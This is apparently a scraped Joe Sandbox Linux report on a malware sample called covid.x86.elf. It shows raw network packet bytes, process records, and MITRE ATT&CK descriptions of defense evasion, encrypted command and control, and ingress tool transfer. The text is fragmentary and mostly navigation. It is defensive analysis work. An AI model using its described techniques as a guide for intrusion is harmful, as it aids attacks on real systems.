Jan 6, 2025 16:22:41.696306944 CET	484	IN	Data Raw: e9 ff ff 89 44 24 24 68 ff ff 00 00 6a 11 57 56 e8 11 e9 ff ff 89 44 24 38 83 c4 20 68 ff ff 00 00 6a 12 57 56 e8 fc e8 ff ff 89 44 24 2c 6a 00 6a 0b 57 56 e8 ed e8 ff ff 89 44 24 40 83 c4 20 6a 01 6a 0c 57 56 e8 db e8 ff ff 89 44 24 34 6a 00 6a Data Ascii: D$$hjWVD$8 hjWVD$,jjWVD$@ jjWVD$4jjWVD$H jjWVD$<jjWVD$P jjWVhjWVD$d jjWVwD$[`;PjWVD$ljjjD$D@D$hjD$x
Jan 6, 2025 16:22:41.696317911 CET	1236	IN	Data Raw: 43 04 8a 44 24 4c 83 c4 10 88 43 08 80 7c 24 3d 00 74 06 66 c7 43 06 40 00 c6 43 09 06 8b 54 24 4c 8b 8c 24 84 00 00 00 89 53 0c 8b 44 24 68 8d 04 40 8b 44 c1 10 89 43 10 66 8b 44 24 3e 66 c1 c8 08 66 89 43 14 8b 44 24 40 66 c1 c8 08 66 89 46 02 Data Ascii: CD$LC\|$=tfC@CT$L$SD$h@DCfD$>ffCD$@ffFfD$Vf%FFPFFL$XT$YT$ZD$[Fi+\|$CfFtNPPt$LC(VP+\$xC\$x;\$D$DT$DL$$Z(~
Jan 6, 2025 16:22:41.701325893 CET	1236	IN	Data Raw: 3c 88 54 24 3f c7 44 24 58 00 00 00 00 85 ed 0f 8e 81 01 00 00 83 e2 01 8a 44 24 20 8b 4c 24 18 88 54 24 03 83 e0 01 66 89 4c 24 46 88 44 24 48 8a 54 24 24 8a 4c 24 28 8a 44 24 2c c0 64 24 03 05 83 e2 01 83 e1 01 83 e0 01 88 54 24 49 88 4c 24 4a Data Ascii: <T$?D$XD$ L$T$fL$FD$HT$$L$(D$,d$T$IL$JD$K1VVjh]T$D$hEsL$EfCKfD$FffCD$HC\|$9tfC@CT$@L$tSD$X@DCfD$:ffCD$<ffFfD$Ff%

System Behavior

Analysis Process: dash PID: 6194, Parent PID: 4331

General

Start time (UTC):	15:22:30
Start date (UTC):	06/01/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6194, Parent PID: 4331

General

Start time (UTC):	15:22:30
Start date (UTC):	06/01/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dash PID: 6195, Parent PID: 4331

General

Start time (UTC):	15:22:30
Start date (UTC):	06/01/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6195, Parent PID: 4331

General

Start time (UTC):	15:22:30
Start date (UTC):	06/01/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: covid.x86.elf PID: 6215, Parent PID: 6128

General

Start time (UTC):	15:22:39
Start date (UTC):	06/01/2025
Path:	/tmp/covid.x86.elf
Arguments:	/tmp/covid.x86.elf
File size:	1196 bytes
MD5 hash:	525a61eb31c84f06ca81ac9dd3fc351c

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report covid.x86.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/condi72

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Packets

System Behavior

Analysis Process: dash PID: 6194, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6194, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6195, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6195, Parent PID: 4331

General

Chronological Activities

Analysis Process: covid.x86.elf PID: 6215, Parent PID: 6128

General

Chronological Activities

Linux Analysis Report
covid.x86.elf